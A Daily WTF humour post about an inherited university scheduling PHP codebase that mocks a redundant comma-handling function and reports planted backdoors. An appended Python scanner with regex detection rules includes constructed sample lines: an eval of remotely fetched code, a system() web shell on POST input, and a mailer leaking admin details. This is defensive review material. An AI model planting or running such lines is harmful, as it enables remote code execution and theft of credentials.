CodeSOD: Weakly Courses

Kerin inherited a scheduling application for a university. This application stored the scheduled days for a class in the database… as one comma-separated field. This was a problem for Kerin, who was hired to add predictive scheduling and classroom density measurements to the system.

This particular function was written to take that data and transform it for display. Sort of.

function getDaysEnrollment($DayStr){
    $Days = explode(',',$DayStr);
    $StrDay = "";
    if(sizeof($Days)>0){
        foreach($Days as $day) {
            switch($day) {
                case 'M':
                    $StrDay .=" Mon,";
                    break;
                case 'T':
                    $StrDay .=" Tue,";
                    break;
                case 'W':
                    $StrDay .=" Wen,";
                    break;
                case 'TH':
                    $StrDay .=" Thu,";
                    break;
                case 'F':
                    $StrDay .=" Fri,";
                    break;
            }
        }
        $StrDay = substr($StrDay,0,-1);
    }
    return $StrDay;
}

So, at its core, this function wants to loop through the list of days and convert them from short abbreviations, like "M", to longer abbreviations, like "Mon". It then keeps concatenating each one together, but with a twist- it strips the commas. $StrDay = substr($StrDay,0,-1); rips off the last character, which would be the comma. Except they hard-coded the comma into the strings they're concatenating in the first place. It's completely superfluous. There's no need for that, they could have just not done the commas.

According to Kerin, this isn't the worst thing in the code, but it is the "punchiest". I'll let Kerin explain some of the things in this codebase:

[I found this] nestled in amongst mountains of similarly-awful code, Slovenian-language comments, and - I'm being completely serious here - executing code loaded from a text file on a remote, foreign-language MMORPG blog's domain.
If I were to hazard a guess, the remote code is probably insurance - there were a couple other similar tricks like a concealed PHP shell and an emailer that phones home with the current admin details if the IP address changes.
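
The three kinds of planted code Kerin describes (remotely loaded code, a concealed shell, a phone-home mailer) can be triaged with a pattern scan over the PHP sources. This is an added example, not code from the original post or from the application; the rule patterns, the names `scan_php` and `scan_tree`, and the sample lines are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Review heuristics (assumptions, not signatures taken from Kerin's codebase).
RULES = [
    # Code fetched from elsewhere and then executed or included.
    ("remote-code-load", re.compile(
        r"\b(?:eval|assert|include(?:_once)?|require(?:_once)?)\b[^;]*"
        r"(?:https?://|\bfile_get_contents\s*\(|\bcurl_exec\s*\()", re.I)),
    # Request parameters flowing straight into an execution sink (web shell).
    ("request-to-exec", re.compile(
        r"\b(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open)\s*\("
        r"[^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    # mail() with a hard-coded recipient: check who receives what.
    ("hardcoded-mail-recipient", re.compile(
        r"\bmail\s*\(\s*['\"][^'\"]+@[^'\"]+['\"]", re.I)),
]

def scan_php(source):
    """Return (line_number, rule_name, stripped_line) for every rule hit."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name, line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file under root; returns {path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample, not code from the application described above.
SAMPLE = """<?php
function getDaysEnrollment($DayStr){ $Days = explode(',',$DayStr); }
$cfg = file_get_contents('config/days.txt');
eval(file_get_contents('http://blog.example.invalid/notes.txt'));
if (isset($_POST['k'])) { system($_POST['k']); }
mail('ops@example.invalid', 'status', $adminName . ':' . $_SERVER['REMOTE_ADDR']);
mail($student->email, 'Schedule', $body);
"""

if __name__ == "__main__":
    for number, name, text in scan_php(SAMPLE):
        print(f"line {number}: {name}: {text}")
```

Hits are leads for manual review, not verdicts: a line-based regex misses obfuscated or multi-line constructs, so an inherited codebase like this one still needs a full read and a comparison against known-good sources.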


This post originally appeared on The Daily WTF.
